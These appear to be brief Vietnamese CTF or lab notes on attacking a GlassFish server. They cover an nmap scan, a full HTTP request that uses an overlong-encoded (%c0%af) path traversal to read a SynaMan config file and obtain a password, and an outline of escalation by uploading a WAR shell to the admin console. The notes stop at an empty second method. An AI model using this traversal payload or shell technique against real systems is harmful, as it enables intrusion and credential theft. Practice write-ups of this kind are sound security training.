Fish - path traverser - c0%af - encoding bypass path server

nmap Sau đó tìm open port

sau khi tìm open port thì tìm exploit

Có được path traverser

Google config file của Glasfish

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/AppConfig.xml HTTP/1.1

-> KingOfAtlantis

Leo thang

Cách 1:

Vào localhost:4848 Upload file war -> listen rồi chạy shell

Cách 2: